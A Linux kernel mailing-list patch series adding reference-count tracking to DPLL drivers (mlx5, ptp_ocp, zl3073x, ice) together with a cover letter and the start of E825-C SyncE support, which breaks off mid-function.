b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c @@ -438,7 +438,7 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, auxiliary_set_drvdata(adev, mdpll); /* Multiple mdev instances might share one DPLL device. */ - mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE); + mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE, NULL); if (IS_ERR(mdpll->dpll)) { err = PTR_ERR(mdpll->dpll); goto err_free_mdpll; @@ -451,7 +451,8 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, /* Multiple mdev instances might share one DPLL pin. */ mdpll->dpll_pin = dpll_pin_get(clock_id, mlx5_get_dev_index(mdev), - THIS_MODULE, &mlx5_dpll_pin_properties); + THIS_MODULE, &mlx5_dpll_pin_properties, + NULL); if (IS_ERR(mdpll->dpll_pin)) { err = PTR_ERR(mdpll->dpll_pin); goto err_unregister_dpll_device; @@ -479,11 +480,11 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); err_put_dpll_pin: - dpll_pin_put(mdpll->dpll_pin); + dpll_pin_put(mdpll->dpll_pin, NULL); err_unregister_dpll_device: dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); err_put_dpll_device: - dpll_device_put(mdpll->dpll); + dpll_device_put(mdpll->dpll, NULL); err_free_mdpll: kfree(mdpll); return err; @@ -499,9 +500,9 @@ static void mlx5_dpll_remove(struct auxiliary_device *adev) destroy_workqueue(mdpll->wq); dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); - dpll_pin_put(mdpll->dpll_pin); + dpll_pin_put(mdpll->dpll_pin, NULL); dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); - dpll_device_put(mdpll->dpll); + dpll_device_put(mdpll->dpll, NULL); kfree(mdpll); mlx5_dpll_synce_status_set(mdev, diff --git a/drivers/ptp/ptp_ocp.c b/drivers/ptp/ptp_ocp.c index 65fe05cac8c42..f39b3966b3e8c 100644 --- a/drivers/ptp/ptp_ocp.c +++ b/drivers/ptp/ptp_ocp.c @@ -4788,7 +4788,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) 
devlink_register(devlink); clkid = pci_get_dsn(pdev); - bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE); + bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE, NULL); if (IS_ERR(bp->dpll)) { err = PTR_ERR(bp->dpll); dev_err(&pdev->dev, "dpll_device_alloc failed\n"); @@ -4800,7 +4800,8 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) goto out; for (i = 0; i < OCP_SMA_NUM; i++) { - bp->sma[i].dpll_pin = dpll_pin_get(clkid, i, THIS_MODULE, &bp->sma[i].dpll_prop); + bp->sma[i].dpll_pin = dpll_pin_get(clkid, i, THIS_MODULE, + &bp->sma[i].dpll_prop, NULL); if (IS_ERR(bp->sma[i].dpll_pin)) { err = PTR_ERR(bp->sma[i].dpll_pin); goto out_dpll; @@ -4809,7 +4810,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) err = dpll_pin_register(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); if (err) { - dpll_pin_put(bp->sma[i].dpll_pin); + dpll_pin_put(bp->sma[i].dpll_pin, NULL); goto out_dpll; } } @@ -4819,9 +4820,9 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) out_dpll: while (i--) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin); + dpll_pin_put(bp->sma[i].dpll_pin, NULL); } - dpll_device_put(bp->dpll); + dpll_device_put(bp->dpll, NULL); out: ptp_ocp_detach(bp); out_disable: @@ -4842,11 +4843,11 @@ ptp_ocp_remove(struct pci_dev *pdev) for (i = 0; i < OCP_SMA_NUM; i++) { if (bp->sma[i].dpll_pin) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin); + dpll_pin_put(bp->sma[i].dpll_pin, NULL); } } dpll_device_unregister(bp->dpll, &dpll_ops, bp); - dpll_device_put(bp->dpll); + dpll_device_put(bp->dpll, NULL); devlink_unregister(devlink); ptp_ocp_detach(bp); pci_disable_device(pdev); diff --git a/include/linux/dpll.h b/include/linux/dpll.h index 8fff048131f1d..5c80cdab0c180 100644 --- a/include/linux/dpll.h +++ b/include/linux/dpll.h @@ -18,6 +18,7 @@ struct dpll_device; 
struct dpll_pin; struct dpll_pin_esync; struct fwnode_handle; +struct ref_tracker; struct dpll_device_ops { int (*mode_get)(const struct dpll_device *dpll, void *dpll_priv, @@ -173,6 +174,12 @@ struct dpll_pin_properties { u32 phase_gran; }; +#ifdef CONFIG_DPLL_REFCNT_TRACKER +typedef struct ref_tracker *dpll_tracker; +#else +typedef struct {} dpll_tracker; +#endif + #define DPLL_DEVICE_CREATED 1 #define DPLL_DEVICE_DELETED 2 #define DPLL_DEVICE_CHANGED 3 @@ -205,7 +212,8 @@ size_t dpll_netdev_pin_handle_size(const struct net_device *dev); int dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev); -struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode); +struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode, + dpll_tracker *tracker); #else static inline void dpll_netdev_pin_set(struct net_device *dev, struct dpll_pin *dpll_pin) { } @@ -223,16 +231,17 @@ dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev) } static inline struct dpll_pin * -fwnode_dpll_pin_find(struct fwnode_handle *fwnode) +fwnode_dpll_pin_find(struct fwnode_handle *fwnode, dpll_tracker *tracker) { return NULL; } #endif struct dpll_device * -dpll_device_get(u64 clock_id, u32 dev_driver_id, struct module *module); +dpll_device_get(u64 clock_id, u32 dev_driver_id, struct module *module, + dpll_tracker *tracker); -void dpll_device_put(struct dpll_device *dpll); +void dpll_device_put(struct dpll_device *dpll, dpll_tracker *tracker); int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, const struct dpll_device_ops *ops, void *priv); @@ -244,7 +253,7 @@ void dpll_device_unregister(struct dpll_device *dpll, struct dpll_pin * dpll_pin_get(u64 clock_id, u32 dev_driver_id, struct module *module, - const struct dpll_pin_properties *prop); + const struct dpll_pin_properties *prop, dpll_tracker *tracker); int dpll_pin_register(struct dpll_device *dpll, struct dpll_pin *pin, const struct dpll_pin_ops *ops, void *priv);
@@ -252,7 +261,7 @@ int dpll_pin_register(struct dpll_device *dpll, struct dpll_pin *pin, void dpll_pin_unregister(struct dpll_device *dpll, struct dpll_pin *pin, const struct dpll_pin_ops *ops, void *priv); -void dpll_pin_put(struct dpll_pin *pin); +void dpll_pin_put(struct dpll_pin *pin, dpll_tracker *tracker); void dpll_pin_fwnode_set(struct dpll_pin *pin, struct fwnode_handle *fwnode); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:36 +0100", "thread_id": "20260202171638.17427-4-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. 
Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Update existing DPLL drivers to utilize the DPLL reference count tracking infrastructure. Add dpll_tracker fields to the drivers' internal device and pin structures. Pass pointers to these trackers when calling dpll_device_get/put() and dpll_pin_get/put(). This allows developers to inspect the specific references held by this driver via debugfs when CONFIG_DPLL_REFCNT_TRACKER is enabled, aiding in the debugging of resource leaks. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/zl3073x/dpll.c | 14 ++++++++------ drivers/dpll/zl3073x/dpll.h | 2 ++ drivers/net/ethernet/intel/ice/ice_dpll.c | 15 ++++++++------- drivers/net/ethernet/intel/ice/ice_dpll.h | 4 ++++ drivers/net/ethernet/mellanox/mlx5/core/dpll.c | 15 +++++++++------ drivers/ptp/ptp_ocp.c | 17 ++++++++++------- 6 files changed, 41 insertions(+), 26 deletions(-) diff --git a/drivers/dpll/zl3073x/dpll.c b/drivers/dpll/zl3073x/dpll.c index 8788bcab7ec53..a99d143a7acde 100644 --- a/drivers/dpll/zl3073x/dpll.c +++ b/drivers/dpll/zl3073x/dpll.c @@ -29,6 +29,7 @@ * @list: this DPLL pin list entry * @dpll: DPLL the pin is registered to * @dpll_pin: pointer to registered dpll_pin + * @tracker: tracking object for the acquired reference * @label: package label * @dir: pin direction * @id: pin id @@ -44,6 +45,7 @@ struct zl3073x_dpll_pin { struct list_head list; struct zl3073x_dpll *dpll; struct dpll_pin *dpll_pin; + dpll_tracker tracker; char label[8]; enum dpll_pin_direction dir; u8 id; @@ -1480,7 +1482,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) /* Create or get existing DPLL pin */ pin->dpll_pin = dpll_pin_get(zldpll->dev->clock_id, index, THIS_MODULE, - &props->dpll_props, NULL); + &props->dpll_props, &pin->tracker); if (IS_ERR(pin->dpll_pin)) { rc = PTR_ERR(pin->dpll_pin); goto err_pin_get; @@ -1503,7 +1505,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) return 0; err_register: - 
dpll_pin_put(pin->dpll_pin, NULL); + dpll_pin_put(pin->dpll_pin, &pin->tracker); err_prio_get: pin->dpll_pin = NULL; err_pin_get: @@ -1534,7 +1536,7 @@ zl3073x_dpll_pin_unregister(struct zl3073x_dpll_pin *pin) /* Unregister the pin */ dpll_pin_unregister(zldpll->dpll_dev, pin->dpll_pin, ops, pin); - dpll_pin_put(pin->dpll_pin, NULL); + dpll_pin_put(pin->dpll_pin, &pin->tracker); pin->dpll_pin = NULL; } @@ -1708,7 +1710,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) dpll_mode_refsel); zldpll->dpll_dev = dpll_device_get(zldev->clock_id, zldpll->id, - THIS_MODULE, NULL); + THIS_MODULE, &zldpll->tracker); if (IS_ERR(zldpll->dpll_dev)) { rc = PTR_ERR(zldpll->dpll_dev); zldpll->dpll_dev = NULL; @@ -1720,7 +1722,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) zl3073x_prop_dpll_type_get(zldev, zldpll->id), &zl3073x_dpll_device_ops, zldpll); if (rc) { - dpll_device_put(zldpll->dpll_dev, NULL); + dpll_device_put(zldpll->dpll_dev, &zldpll->tracker); zldpll->dpll_dev = NULL; } @@ -1743,7 +1745,7 @@ zl3073x_dpll_device_unregister(struct zl3073x_dpll *zldpll) dpll_device_unregister(zldpll->dpll_dev, &zl3073x_dpll_device_ops, zldpll); - dpll_device_put(zldpll->dpll_dev, NULL); + dpll_device_put(zldpll->dpll_dev, &zldpll->tracker); zldpll->dpll_dev = NULL; } diff --git a/drivers/dpll/zl3073x/dpll.h b/drivers/dpll/zl3073x/dpll.h index e8c39b44b356c..c65c798c37927 100644 --- a/drivers/dpll/zl3073x/dpll.h +++ b/drivers/dpll/zl3073x/dpll.h @@ -18,6 +18,7 @@ * @check_count: periodic check counter * @phase_monitor: is phase offset monitor enabled * @dpll_dev: pointer to registered DPLL device + * @tracker: tracking object for the acquired reference * @lock_status: last saved DPLL lock status * @pins: list of pins * @change_work: device change notification work @@ -31,6 +32,7 @@ struct zl3073x_dpll { u8 check_count; bool phase_monitor; struct dpll_device *dpll_dev; + dpll_tracker tracker; enum dpll_lock_status lock_status; struct list_head pins; struct 
work_struct change_work; diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.c b/drivers/net/ethernet/intel/ice/ice_dpll.c index 64b7b045ecd58..4eca62688d834 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.c +++ b/drivers/net/ethernet/intel/ice/ice_dpll.c @@ -2814,7 +2814,7 @@ static void ice_dpll_release_pins(struct ice_dpll_pin *pins, int count) int i; for (i = 0; i < count; i++) - dpll_pin_put(pins[i].pin, NULL); + dpll_pin_put(pins[i].pin, &pins[i].tracker); } /** @@ -2840,7 +2840,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, for (i = 0; i < count; i++) { pins[i].pin = dpll_pin_get(clock_id, i + start_idx, THIS_MODULE, - &pins[i].prop, NULL); + &pins[i].prop, &pins[i].tracker); if (IS_ERR(pins[i].pin)) { ret = PTR_ERR(pins[i].pin); goto release_pins; @@ -2851,7 +2851,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, release_pins: while (--i >= 0) - dpll_pin_put(pins[i].pin, NULL); + dpll_pin_put(pins[i].pin, &pins[i].tracker); return ret; } @@ -3037,7 +3037,7 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) if (WARN_ON_ONCE(!vsi || !vsi->netdev)) return; dpll_netdev_pin_clear(vsi->netdev); - dpll_pin_put(rclk->pin, NULL); + dpll_pin_put(rclk->pin, &rclk->tracker); } /** @@ -3247,7 +3247,7 @@ ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) { if (cgu) dpll_device_unregister(d->dpll, d->ops, d); - dpll_device_put(d->dpll, NULL); + dpll_device_put(d->dpll, &d->tracker); } /** @@ -3271,7 +3271,8 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, u64 clock_id = pf->dplls.clock_id; int ret; - d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE, NULL); + d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE, + &d->tracker); if (IS_ERR(d->dpll)) { ret = PTR_ERR(d->dpll); dev_err(ice_pf_to_dev(pf), @@ -3287,7 +3288,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, ice_dpll_update_state(pf, d, true); ret = dpll_device_register(d->dpll, 
type, ops, d); if (ret) { - dpll_device_put(d->dpll, NULL); + dpll_device_put(d->dpll, &d->tracker); return ret; } d->ops = ops; diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.h b/drivers/net/ethernet/intel/ice/ice_dpll.h index c0da03384ce91..63fac6510df6e 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.h +++ b/drivers/net/ethernet/intel/ice/ice_dpll.h @@ -23,6 +23,7 @@ enum ice_dpll_pin_sw { /** ice_dpll_pin - store info about pins * @pin: dpll pin structure * @pf: pointer to pf, which has registered the dpll_pin + * @tracker: reference count tracker * @idx: ice pin private idx * @num_parents: hols number of parent pins * @parent_idx: hold indexes of parent pins @@ -37,6 +38,7 @@ enum ice_dpll_pin_sw { struct ice_dpll_pin { struct dpll_pin *pin; struct ice_pf *pf; + dpll_tracker tracker; u8 idx; u8 num_parents; u8 parent_idx[ICE_DPLL_RCLK_NUM_MAX]; @@ -58,6 +60,7 @@ struct ice_dpll_pin { /** ice_dpll - store info required for DPLL control * @dpll: pointer to dpll dev * @pf: pointer to pf, which has registered the dpll_device + * @tracker: reference count tracker * @dpll_idx: index of dpll on the NIC * @input_idx: currently selected input index * @prev_input_idx: previously selected input index @@ -76,6 +79,7 @@ struct ice_dpll_pin { struct ice_dpll { struct dpll_device *dpll; struct ice_pf *pf; + dpll_tracker tracker; u8 dpll_idx; u8 input_idx; u8 prev_input_idx; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c index 541d83e5d7183..3981dd81d4c17 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c @@ -9,7 +9,9 @@ */ struct mlx5_dpll { struct dpll_device *dpll; + dpll_tracker dpll_tracker; struct dpll_pin *dpll_pin; + dpll_tracker pin_tracker; struct mlx5_core_dev *mdev; struct workqueue_struct *wq; struct delayed_work work; @@ -438,7 +440,8 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, auxiliary_set_drvdata(adev, mdpll); 
/* Multiple mdev instances might share one DPLL device. */ - mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE, NULL); + mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE, + &mdpll->dpll_tracker); if (IS_ERR(mdpll->dpll)) { err = PTR_ERR(mdpll->dpll); goto err_free_mdpll; @@ -452,7 +455,7 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, /* Multiple mdev instances might share one DPLL pin. */ mdpll->dpll_pin = dpll_pin_get(clock_id, mlx5_get_dev_index(mdev), THIS_MODULE, &mlx5_dpll_pin_properties, - NULL); + &mdpll->pin_tracker); if (IS_ERR(mdpll->dpll_pin)) { err = PTR_ERR(mdpll->dpll_pin); goto err_unregister_dpll_device; @@ -480,11 +483,11 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); err_put_dpll_pin: - dpll_pin_put(mdpll->dpll_pin, NULL); + dpll_pin_put(mdpll->dpll_pin, &mdpll->pin_tracker); err_unregister_dpll_device: dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); err_put_dpll_device: - dpll_device_put(mdpll->dpll, NULL); + dpll_device_put(mdpll->dpll, &mdpll->dpll_tracker); err_free_mdpll: kfree(mdpll); return err; @@ -500,9 +503,9 @@ static void mlx5_dpll_remove(struct auxiliary_device *adev) destroy_workqueue(mdpll->wq); dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); - dpll_pin_put(mdpll->dpll_pin, NULL); + dpll_pin_put(mdpll->dpll_pin, &mdpll->pin_tracker); dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); - dpll_device_put(mdpll->dpll, NULL); + dpll_device_put(mdpll->dpll, &mdpll->dpll_tracker); kfree(mdpll); mlx5_dpll_synce_status_set(mdev, diff --git a/drivers/ptp/ptp_ocp.c b/drivers/ptp/ptp_ocp.c index f39b3966b3e8c..1b16a9c3d7fdc 100644 --- a/drivers/ptp/ptp_ocp.c +++ b/drivers/ptp/ptp_ocp.c @@ -285,6 +285,7 @@ struct ptp_ocp_sma_connector { u8 default_fcn; struct dpll_pin *dpll_pin; struct dpll_pin_properties dpll_prop; + dpll_tracker tracker; }; struct ocp_attr_group 
{ @@ -383,6 +384,7 @@ struct ptp_ocp { struct ptp_ocp_sma_connector sma[OCP_SMA_NUM]; const struct ocp_sma_op *sma_op; struct dpll_device *dpll; + dpll_tracker tracker; int signals_nr; int freq_in_nr; }; @@ -4788,7 +4790,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) devlink_register(devlink); clkid = pci_get_dsn(pdev); - bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE, NULL); + bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE, &bp->tracker); if (IS_ERR(bp->dpll)) { err = PTR_ERR(bp->dpll); dev_err(&pdev->dev, "dpll_device_alloc failed\n"); @@ -4801,7 +4803,8 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) for (i = 0; i < OCP_SMA_NUM; i++) { bp->sma[i].dpll_pin = dpll_pin_get(clkid, i, THIS_MODULE, - &bp->sma[i].dpll_prop, NULL); + &bp->sma[i].dpll_prop, + &bp->sma[i].tracker); if (IS_ERR(bp->sma[i].dpll_pin)) { err = PTR_ERR(bp->sma[i].dpll_pin); goto out_dpll; @@ -4810,7 +4813,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) err = dpll_pin_register(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); if (err) { - dpll_pin_put(bp->sma[i].dpll_pin, NULL); + dpll_pin_put(bp->sma[i].dpll_pin, &bp->sma[i].tracker); goto out_dpll; } } @@ -4820,9 +4823,9 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) out_dpll: while (i--) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin, NULL); + dpll_pin_put(bp->sma[i].dpll_pin, &bp->sma[i].tracker); } - dpll_device_put(bp->dpll, NULL); + dpll_device_put(bp->dpll, &bp->tracker); out: ptp_ocp_detach(bp); out_disable: @@ -4843,11 +4846,11 @@ ptp_ocp_remove(struct pci_dev *pdev) for (i = 0; i < OCP_SMA_NUM; i++) { if (bp->sma[i].dpll_pin) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin, NULL); + dpll_pin_put(bp->sma[i].dpll_pin, &bp->sma[i].tracker); } } dpll_device_unregister(bp->dpll, &dpll_ops, 
bp); - dpll_device_put(bp->dpll, NULL); + dpll_device_put(bp->dpll, &bp->tracker); devlink_unregister(devlink); ptp_ocp_detach(bp); pci_disable_device(pdev); -- 2.52.0
From: Arkadiusz Kubalewski <arkadiusz.kubalewski@intel.com>

Implement SyncE support for the E825-C Ethernet controller using the
DPLL subsystem. Unlike E810, the E825-C architecture relies on platform
firmware (ACPI) to describe connections between the NIC's recovered
clock outputs and external DPLL inputs.

Implement the following mechanisms to support this architecture:

1. Discovery Mechanism: The driver parses the 'dpll-pins' and
   'dpll-pin-names' firmware properties to identify the external DPLL
   pins (parents) corresponding to its RCLK outputs ("rclk0", "rclk1").
   It uses fwnode_dpll_pin_find() to locate these parent pins in the
   DPLL core.

2. Asynchronous Registration: Since the platform DPLL driver (e.g.
   zl3073x) may probe independently of the network driver, utilize the
   DPLL notifier chain. The driver listens for DPLL_PIN_CREATED events
   to detect when the parent MUX pins become available, then registers
   its own Recovered Clock (RCLK) pins as children of those parents.

3. Hardware Configuration: Implement the specific register access logic
   for the E825-C CGU (Clock Generation Unit) registers (R10, R11). This
   includes configuring the bypass MUXes and clock dividers required to
   drive SyncE signals.

4. Split Initialization: Refactor `ice_dpll_init()` to separate the
   static initialization path of E810 from the dynamic, firmware-driven
   path required for E825-C.
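The state read-back added in this patch reduces to a bit-field compare:
the CLK_SYNCE pin is reported CONNECTED when the CGU bypass mux field
selects this port. A minimal userspace sketch follows, using simplified
stand-ins for the kernel's GENMASK()/FIELD_GET() helpers; the mask and
mux offset values are the ones the patch adds to ice_dpll.h, while
rclk0_connected() is a made-up name mirroring the check in
ice_dpll_rclk_update_e825c():

```c
#include <stdbool.h>
#include <stdint.h>

/* Simplified userspace stand-ins for the kernel helpers. */
#define GENMASK(h, l)        ((~0u << (l)) & (~0u >> (31 - (h))))
#define FIELD_GET(mask, reg) (((reg) & (mask)) >> __builtin_ctz(mask))

/* Values taken from the ice_dpll.h hunk in this patch. */
#define ICE_CGU_R10_SYNCE_S_REF_CLK     GENMASK(31, 27)
#define ICE_CGU_BYPASS_MUX_OFFSET_E825C 3

/* CLK_SYNCE0 is CONNECTED when the R10 reference-clock mux field
 * equals this port's number plus the fixed E825-C mux offset. */
static bool rclk0_connected(uint32_t r10, uint8_t port_num)
{
	uint8_t rclk_bits = FIELD_GET(ICE_CGU_R10_SYNCE_S_REF_CLK, r10);

	return rclk_bits == port_num + ICE_CGU_BYPASS_MUX_OFFSET_E825C;
}
```

The same decode applies to CLK_SYNCE1 via the R11 SYNCE_S_BYP_CLK field.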
Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Co-developed-by: Ivan Vecera <ivecera@redhat.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> Co-developed-by: Grzegorz Nitka <grzegorz.nitka@intel.com> Signed-off-by: Grzegorz Nitka <grzegorz.nitka@intel.com> Signed-off-by: Arkadiusz Kubalewski <arkadiusz.kubalewski@intel.com> --- v3: * DPLL init check in ice_ptp_link_change() * using completion for dpll initization to avoid races with DPLL notifier scheduled works * added parsing of dpll-pin-names and dpll-pins properties v2: * fixed error path in ice_dpll_init_pins_e825() * fixed misleading comment referring 'device tree' --- drivers/net/ethernet/intel/ice/ice_dpll.c | 742 +++++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 26 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 ++++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + 8 files changed, 956 insertions(+), 92 deletions(-) diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.c b/drivers/net/ethernet/intel/ice/ice_dpll.c index 4eca62688d834..a8c99e49bfae6 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.c +++ b/drivers/net/ethernet/intel/ice/ice_dpll.c @@ -5,6 +5,7 @@ #include "ice_lib.h" #include "ice_trace.h" #include <linux/dpll.h> +#include <linux/property.h> #define ICE_CGU_STATE_ACQ_ERR_THRESHOLD 50 #define ICE_DPLL_PIN_IDX_INVALID 0xff @@ -528,6 +529,92 @@ ice_dpll_pin_disable(struct ice_hw *hw, struct ice_dpll_pin *pin, return ret; } +/** + * ice_dpll_pin_store_state - updates the state of pin in SW bookkeeping + * @pin: pointer to a pin + * @parent: parent pin index + * @state: pin state (connected or disconnected) + */ +static void +ice_dpll_pin_store_state(struct ice_dpll_pin *pin, int parent, bool state) +{ + pin->state[parent] = state ? 
